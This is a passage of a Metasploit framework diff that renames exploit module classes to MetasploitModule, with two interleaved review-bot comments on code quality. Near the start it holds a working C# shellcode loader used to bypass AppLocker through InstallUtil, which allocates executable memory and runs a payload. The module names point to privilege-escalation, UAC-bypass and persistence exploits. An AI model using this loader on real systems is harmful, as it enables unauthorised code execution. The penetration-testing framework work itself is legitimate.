'' : '64'}" + paths = dir(base_path).select {|p| p[0] == 'v'} + dotnet_path = nil + + paths.reverse.each do |p| + path = "#{base_path}\\#{p}" + if directory?(path) && file?("#{path}\\InstallUtil.exe") + dotnet_path = path + break + end + end + + unless dotnet_path + fail_with(Failure::NotVulnerable, '.NET is not present on the target.') + end + + dotnet_path + end + + def generate_csharp_source + sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',') + cs = %Q^ +using System; + +namespace Pop +{ + public class Program { public static void Main() { } } + + [System.ComponentModel.RunInstaller(true)] + public class Pop : System.Configuration.Install.Installer + { + private static Int32 MEM_COMMIT=0x1000; + private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; + private static UInt32 INFINITE = 0xFFFFFFFF; + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); + + public override void Uninstall(System.Collections.IDictionary s) + { + byte[] sc = new byte[] {#{sc}}; + IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); + IntPtr id = IntPtr.Zero; + WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); + } + } +} + ^ + + cs + end + +end + diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 00c7b0b0bb..2f724f8609 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb 
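Review bot: In `exploit` of applocker_bypass.rb, the architecture check reads `sysinfo['Architecture']` before the later `print_status(...) if not sysinfo.nil?` guard, so on the x64 path a nil `sysinfo` raises before the guard is ever reached. Test `sysinfo` once at the top of the method, or drop the guard if the declared `'SessionTypes' => [ 'meterpreter' ]` already guarantees it. The same check compares `payload.arch.first` with the literal `'x64'` while the metadata declares `ARCH_X86_64`; if that constant's value is not `'x64'` the mismatch is never reported and `fail_with(Failure::NoTarget, ...)` is dead code, so `payload.arch.first == ARCH_X86_64` would keep the two in step. In `execute_installutil` the return value of the compiler's `cmd_exec` is discarded; a `file?(exe_path)` test followed by `fail_with` would surface a failed build instead of continuing silently.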
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Priv diff --git a/modules/exploits/windows/local/bthpan.rb b/modules/exploits/windows/local/bthpan.rb index e0e5d015cd..b084b24773 100644 --- a/modules/exploits/windows/local/bthpan.rb +++ b/modules/exploits/windows/local/bthpan.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 8cfb23418c..f5681dbe45 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 9bc5fa4028..3262061082 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_vbs.rb b/modules/exploits/windows/local/bypassuac_vbs.rb index b560da405e..ae10158825 100644 --- a/modules/exploits/windows/local/bypassuac_vbs.rb +++ b/modules/exploits/windows/local/bypassuac_vbs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper 
diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index 58729c5f29..46c9d307fb 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Services diff --git a/modules/exploits/windows/local/ikeext_service.rb b/modules/exploits/windows/local/ikeext_service.rb index 7278e5aee6..e5c9b15868 100644 --- a/modules/exploits/windows/local/ikeext_service.rb +++ b/modules/exploits/windows/local/ikeext_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ipass_launch_app.rb b/modules/exploits/windows/local/ipass_launch_app.rb index 1a49cb233d..566b014ddf 100644 --- a/modules/exploits/windows/local/ipass_launch_app.rb +++ b/modules/exploits/windows/local/ipass_launch_app.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb index 35e5fe61b1..1eeeb00c31 100644 --- a/modules/exploits/windows/local/lenovo_systemupdate.rb +++ b/modules/exploits/windows/local/lenovo_systemupdate.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper 
diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb index 024fb55adc..8938107475 100644 --- a/modules/exploits/windows/local/mqac_write.rb +++ b/modules/exploits/windows/local/mqac_write.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index 8145b65278..351038ada4 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/exploit/exe' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index dc91903f4b..407161bcf0 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -8,7 +8,7 @@ require 'rex' require 'zlib' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 662481af63..f058484caf 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking # Average because this module relies on memory corruption within the # kernel, this is inherently dangerous. Also if the payload casues diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb index 8729306125..c8a04ce87c 100644 --- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb +++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 8d647f7a8d..3900bcd413 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb index 7095e49f9e..1113a98ddf 100644 --- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File 
diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index de49e4a47d..dae1068507 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index a4d5236714..62d6b47a1d 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb index 2908ef555f..6e84605d84 100644 --- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb index d1430d6bab..e1eb99561c 100644 --- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb +++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms15_004_tswbproxy.rb b/modules/exploits/windows/local/ms15_004_tswbproxy.rb index a8cf36d104..1d78cc08f4 100644 --- a/modules/exploits/windows/local/ms15_004_tswbproxy.rb +++ b/modules/exploits/windows/local/ms15_004_tswbproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb index afa42a0dcd..eae20ef784 100644 --- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb +++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index e78ff63d46..76dbcb4529 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index dfa59f4b35..441ee622ba 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 97b5f6d5b6..48e194aefb 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index e68b7eb646..9a2ef1896d 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/ntapphelpcachecontrol.rb b/modules/exploits/windows/local/ntapphelpcachecontrol.rb index a0269a72b3..5550173d86 100644 --- a/modules/exploits/windows/local/ntapphelpcachecontrol.rb +++ b/modules/exploits/windows/local/ntapphelpcachecontrol.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index eaab094978..97c19714e1 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb 
@@ -11,7 +11,7 @@ require 'msf/core/post/windows/process' require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/post/windows/services' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 8648ea1dac..28b51ccb19 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Process diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index d719b37e3a..ff010ea276 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb index 8a8b4bc1bc..b3258d5b41 100644 --- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb +++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb index 30ad2442b7..ac63c1c122 100644 --- a/modules/exploits/windows/local/powershell_remoting.rb 
+++ b/modules/exploits/windows/local/powershell_remoting.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb index 9bf0d99c53..9ec2c9df0b 100644 --- a/modules/exploits/windows/local/ppr_flatten_rec.rb +++ b/modules/exploits/windows/local/ppr_flatten_rec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/pxeexploit.rb b/modules/exploits/windows/local/pxeexploit.rb index 5830e98536..746a8bdc81 100644 --- a/modules/exploits/windows/local/pxeexploit.rb +++ b/modules/exploits/windows/local/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::TFTPServer diff --git a/modules/exploits/windows/local/registry_persistence.rb b/modules/exploits/windows/local/registry_persistence.rb index 6efe4a89dc..77dc63224d 100644 --- a/modules/exploits/windows/local/registry_persistence.rb +++ b/modules/exploits/windows/local/registry_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb index 122e0262f3..27d43d5cb9 100644 --- a/modules/exploits/windows/local/run_as.rb +++ b/modules/exploits/windows/local/run_as.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 40a4dc77e1..f5c11bf244 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Local register_options( [ OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), - OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', '0']), + OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]), OptString.new('REXENAME', [false, 'Name of exe on remote system']), OptString.new('RTASKNAME', [false, 'Name of task on remote system']), diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 5f182feb70..6d80118ba9 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index dcea5907f9..9ac1b902f0 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb 
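Review bot: In the s4u_persistence.rb `register_options` hunk, the `EXPIRE_TIME` description does not say what the new integer default `0` means, so an operator cannot tell whether the scheduled task expires immediately or never. The handling of the value is outside the hunk; if `0` disables expiry, say so in the option text, e.g. `OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires (0 = no expiry)', 0]),`. `FREQUENCY` on the line above is optional with no default, and its description should likewise state what happens when it is unset.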
+++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/virtual_box_guest_additions.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb index fc78d7e63f..0f4af645c4 100644 --- a/modules/exploits/windows/local/virtual_box_guest_additions.rb +++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 22a5db2c6e..5aa74dbfa1 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking DEVICE = '\\\\.\\VBoxGuest' diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb index f02c1e5a6c..ae7a9a89ed 100644 --- a/modules/exploits/windows/local/vss_persistence.rb +++ b/modules/exploits/windows/local/vss_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 3f6a75d772..a57469af53 100644 --- a/modules/exploits/windows/local/wmi.rb 
+++ b/modules/exploits/windows/local/wmi.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index c806bb71d6..d7aa39f5d0 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index f5876e4d5e..15c6f3465b 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index f86f06cf09..0152389d2e 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb index 95cc18d40f..c81eba5b73 100644 --- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb +++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # needs client interaction and permanent listener # diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 2696dfd9cf..783fc8ec7c 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 56f7267fc3..aa57ae65e4 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index c41eccb25d..e370868b86 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index ee2d364df6..6e5354b7e5 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/misc/achat_bof.rb b/modules/exploits/windows/misc/achat_bof.rb index 7a53dee238..378dcd3d7a 100644 --- a/modules/exploits/windows/misc/achat_bof.rb +++ b/modules/exploits/windows/misc/achat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb index 2cf6fd756e..970804766e 100644 --- a/modules/exploits/windows/misc/actfax_raw_server_bof.rb +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index 8fcdb9e6d8..64aa24d4a0 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb index 0d02343531..2ecd64761c 100644 --- a/modules/exploits/windows/misc/allmediaserver_bof.rb +++ b/modules/exploits/windows/misc/allmediaserver_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git 